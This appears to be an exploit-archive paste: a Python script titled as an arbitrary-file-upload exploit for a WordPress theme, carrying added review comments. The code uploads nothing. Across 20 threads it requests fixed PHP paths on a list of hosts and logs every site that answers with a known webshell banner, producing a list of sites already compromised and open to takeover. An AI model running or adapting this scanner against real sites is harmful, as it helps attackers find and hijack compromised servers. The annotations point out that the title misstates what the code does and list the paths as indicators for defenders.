FlyFar

Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload

Apr 11th, 2024
  1. # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload
  2. # Date: 2024-04-01
  3. # Author: Milad Karimi (Ex3ptionaL)
  4. # Category: webapps
  5. # Tested on: Windows 10, Firefox
  6.  
  7. import sys
  8. import os.path
  9. import requests
  10. import re
  11. import urllib3
  12. from requests.exceptions import SSLError
  13. from multiprocessing.dummy import Pool as ThreadPool
  14. from colorama import Fore, init
# colorama: restore the default colour after every print call.
init(autoreset=True)

# Colour roles used by the console output below.
error_color, info_color = Fore.RED, Fore.CYAN
success_color, highlight_color = Fore.GREEN, Fore.MAGENTA

# Silences urllib3 warnings for the whole process; this includes the
# InsecureRequestWarning that the verify=False requests in check_security
# would otherwise emit.
requests.urllib3.disable_warnings()

# Request headers shared by every probe in this file. The values never vary
# between requests, so in web-server logs the fixed Android WebView User-Agent
# together with the scheme-less Referer 'www.google.com' is a stable
# fingerprint of this script's traffic.
headers = dict([
    ('Connection', 'keep-alive'),
    ('Cache-Control', 'max-age=0'),
    ('Upgrade-Insecure-Requests', '1'),
    ('User-Agent',
     'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) '
     'AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 '
     'Chrome/60.0.3112.107 Mobile Safari/537.36'),
    ('Accept',
     'text/html,application/xhtml+xml,application/xml;q=0.9,'
     'image/webp,image/apng,*/*;q=0.8'),
    ('Accept-Encoding', 'gzip, deflate'),
    ('Accept-Language', 'en-US,en;q=0.9,fr;q=0.8'),
    ('Referer', 'www.google.com'),
])
def URLdomain(url):
    """Return the part of *url* before the first '/' once the scheme is removed.

    Only a lowercase ``http://`` or ``https://`` prefix is recognised. When one
    is present, every occurrence of that scheme text in the string is removed
    (``str.replace``), not just the leading one. A port or userinfo component,
    if any, stays in the returned value.
    """
    for scheme in ("http://", "https://"):
        if url.startswith(scheme):
            url = url.replace(scheme, "")
            break
    # partition() yields the whole string as the first element when no '/'
    # is present.
    authority, _, _ = url.partition('/')
    return authority
def check_security(url):
    """Request a fixed list of PHP paths on one host and record those whose
    response body contains an expected marker string.

    Nothing in this function uploads a file or looks at a theme version, in
    spite of the "Arbitrary File Upload" title in the file header. It only
    issues GET requests and does substring checks on the responses. Of the
    eight paths, one is under the travelscape theme directory; the rest are
    other theme/plugin directories, the site root and /wp-admin.

    Path -> marker -> output file, in request order:
      /wp-content/themes/travelscape/json.php        'MSQ_403'         MSQ_403.txt
      /wp-content/themes/aahana/json.php             'MSQ_403'         MSQ_403.txt
      /wp-content/themes/travel/issue.php            'Yanz Webshell!'  wso.txt
      /about.php                                     'Yanz Webshell!'  wso.txt
      /wp-content/themes/digital-download/new.php    '#0x2525'         digital-download.txt
      /epinyins.php                                  'Uname:'          wso.txt
      /wp-admin/dropdown.php                         'Uname:'          wso.txt
      /wp-content/plugins/dummyyummy/wp-signup.php   'Simple Shell'    dummyyummy.txt

    NOTE(review): the markers read like banner text of already-planted
    webshells ('Yanz Webshell!', 'Simple Shell'); what 'MSQ_403', '#0x2525'
    and 'Uname:' correspond to cannot be confirmed from this file. For
    defenders the path list and marker strings are the useful part: requests
    for these paths in access logs, or files at these locations containing a
    marker, are worth investigating.

    A match is a plain substring test on the whole body, so any page that
    merely contains the marker text is also recorded as a hit.

    Args:
        url: Host or URL taken from the input list; reduced to its host part
            by URLdomain before each scheme is prepended.

    Returns:
        None. Results are printed and appended to the text files named above.
    """
    fg = success_color
    fr = error_color
    try:
        # First request goes over plain HTTP.
        url = 'http://' + URLdomain(url)
        check = requests.get(url +
            '/wp-content/themes/travelscape/json.php', headers=headers,
            allow_redirects=True, timeout=15)
        if 'MSQ_403' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            # Append mode, no explicit close and no lock; main() calls this
            # function from 20 threads.
            open('MSQ_403.txt', 'a').write(url +
                '/wp-content/themes/travelscape/json.php\n')
        else:
            # Only reached when the travelscape path did not match. Note the
            # different theme directory (aahana) and that url is rebound to
            # https for everything that follows.
            url = 'https://' + URLdomain(url)
            # verify=False: the server certificate is not validated, so the
            # response is not authenticated as coming from the named host.
            check = requests.get(url +
                '/wp-content/themes/aahana/json.php', headers=headers,
                allow_redirects=True, verify=False, timeout=15)
            if 'MSQ_403' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('MSQ_403.txt', 'a').write(url +
                    '/wp-content/themes/aahana/json.php\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))
        # The remaining requests are at try-block level: they run regardless
        # of the outcome above, using whatever scheme url currently holds.
        check = requests.get(url + '/wp-content/themes/travel/issue.php',
            headers=headers, allow_redirects=True, timeout=15)
        if 'Yanz Webshell!' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url +
                '/wp-content/themes/travel/issue.php\n')
        else:
            # A miss prints nothing here; it only rebinds url to https.
            url = 'https://' + URLdomain(url)
        check = requests.get(url + '/about.php', headers=headers,
            allow_redirects=True, timeout=15)
        if 'Yanz Webshell!' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/about.php\n')
        else:
            url = 'https://' + URLdomain(url)
        check = requests.get(url +
            '/wp-content/themes/digital-download/new.php', headers=headers,
            allow_redirects=True, timeout=15)
        if '#0x2525' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('digital-download.txt', 'a').write(url +
                '/wp-content/themes/digital-download/new.php\n')
        else:
            print(' -| ' + url + ' --> {}[Failed]'.format(fr))
            # Scheme for the next request goes back to plain HTTP.
            url = 'http://' + URLdomain(url)
        check = requests.get(url + '/epinyins.php', headers=headers,
            allow_redirects=True, timeout=15)
        if 'Uname:' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/epinyins.php\n')
        else:
            print(' -| ' + url + ' --> {}[Failed]'.format(fr))
            url = 'https://' + URLdomain(url)
        check = requests.get(url + '/wp-admin/dropdown.php',
            headers=headers, allow_redirects=True, verify=False, timeout=15)
        if 'Uname:' in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')
        else:
            # Last path is requested only when /wp-admin/dropdown.php missed.
            url = 'https://' + URLdomain(url)
            check = requests.get(url +
                '/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,
                allow_redirects=True, verify=False, timeout=15)
            if 'Simple Shell' in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('dummyyummy.txt', 'a').write(url +
                    '/wp-content/plugins/dummyyummy/wp-signup.php\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))
    except Exception as e:
        # Any exception (connection, timeout, TLS, file write) ends the
        # sequence for this host; later paths are not requested.
        print(f' -| {url} --> {fr}[Failed] due to: {e}')
def main():
    """Read a list of hosts from a file and run check_security on each.

    The file path comes from the first command-line argument, or from an
    interactive prompt when no argument is given. The os.path.isfile check is
    applied only to a prompted path; a bad path passed as an argument is
    reported by the read-error branch instead. Each line is stripped and
    passed to check_security as-is, blank lines included.

    The list is fanned out over a pool of 20 threads, so one run produces
    bursts of requests for the same fixed paths across many hosts. Exits with
    status 1 when the file is missing or unreadable.
    """
    if len(sys.argv) > 1:
        url_file_path = sys.argv[1]
    else:
        url_file_path = input(
            f"{info_color}Enter the path to the file containing URLs: ")
        if not os.path.isfile(url_file_path):
            print(f"{error_color}[ERROR] The specified file path is invalid.")
            sys.exit(1)

    try:
        source = open(url_file_path, 'r', encoding='utf-8')
        urls_to_check = list(map(str.strip, source.readlines()))
    except Exception as e:
        print(
            f"{error_color}[ERROR] An error occurred while reading the file: {e}")
        sys.exit(1)

    # Thread-backed pool (multiprocessing.dummy); map() blocks until every
    # entry has been processed.
    workers = ThreadPool(20)
    workers.map(check_security, urls_to_check)
    workers.close()
    workers.join()

    print(
        f"{info_color}Security check process completed successfully. "
        f"Results are saved in corresponding files.")
# Start the run only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()